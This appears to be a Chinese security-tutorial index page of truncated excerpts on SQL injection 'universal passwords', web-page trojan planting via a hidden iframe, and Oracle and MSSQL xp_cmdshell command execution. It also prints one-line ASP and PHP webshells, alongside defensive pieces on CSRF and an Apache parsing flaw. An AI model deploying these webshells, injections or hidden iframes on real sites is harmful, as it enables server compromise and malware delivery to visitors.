小编 安全教程 PHP 万能密码 可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。 其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。 其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。 如果你用这样的万能密码\&...
小编 安全教程 hzhost6.5 华众虚拟主机管理系统最新SQL漏洞(附漏洞补丁) 这次漏洞出在channeldmectr.asp这个文件上,跟本就没有过滤任何参数. 正好我这里有正版的补丁,打开看下了,打上补丁的channeldmectr.asp文件在第21行到第40行,增加了以下代码: 复制代码 代码如下: Function Sa...
小编 安全教程 网页挂马方法和技巧大汇总 1,挂马的N种方法 (1) HTML挂马法。 常规的HTML挂马方法一般是在网页中插入一条iframe语句,像<iframe src=http://www.xxx.com/horse.html width=0 height=0>&l...
小编 安全教程 防止apache的php扩展名解析漏洞 主要问题是:不管文件最后后缀为什么,只要是.php.*结尾,就会被Apache服务器解析成php文件,问题是apache如果在mime.types文件里面没有定义的扩展名在诸如x1.x2.x3的情况下,最后一个x3的没有定义,他会给解析成倒数第二个的x...
小编 安全教程 黑客快速入门 今天的内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息, 包括它的类型,用户列表,目录,端口,漏洞等等。 首先我们我们要找一台主机来练手,随便挑吧!www.dddd.com(乱说的)第一部,呵呵, 先在ie里看看吧,mmmm̷...
小编 安全教程 批处理也疯狂 @echo off set c=00123456789ABCDEF0 :loop set /a num=%random%%%16 call set col=%%c:~%num%,2%% COLOR %col% ping -n3 ...
小编 安全教程 正则表达式的基本语法 正则表达式的基本语法 首先让我们看两个特殊的符号\’^\’和\’$\’。他们的作用是分别指出一个字符串的开始和结束。例子如下: "^The":表示所有以"The...
小编 安全教程 犀利的 oracle 注入技术 犀利的 oracle 注入技术 原文发表在黑客手册 linx 2008.1.12 介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。 以下的演示都是在web上的sql plus执行的,在web注入时 把selec...
小编 安全教程 一句话木马(asp,php) 总结篇 asp一句话 <%execute(request("1"))%> php一句话 <?php eval($_POST[1]);?> aspx一句话 <script language="C#&qu...
小编 安全教程 CSRF—攻击与防御 0x01 什么是CSRF攻击 CSRF是Cross Site Request Forgery的缩写(也缩写为XSRF),直译过来就是跨站请求伪造的意思,也就是在用户会话下对某个CGI做一些GET/POST的事情——这些事情用户未必知道和愿意做,你可以把...
小编 安全教程 mssql的sa权限执行命令方法总结 测试环境:windows xp pro sp2 + mssql 2005(服务以system权限启动) 一.xp_cmdshell EXEC master..xp_cmdshell ‘ipconfig’ 开启xp_c...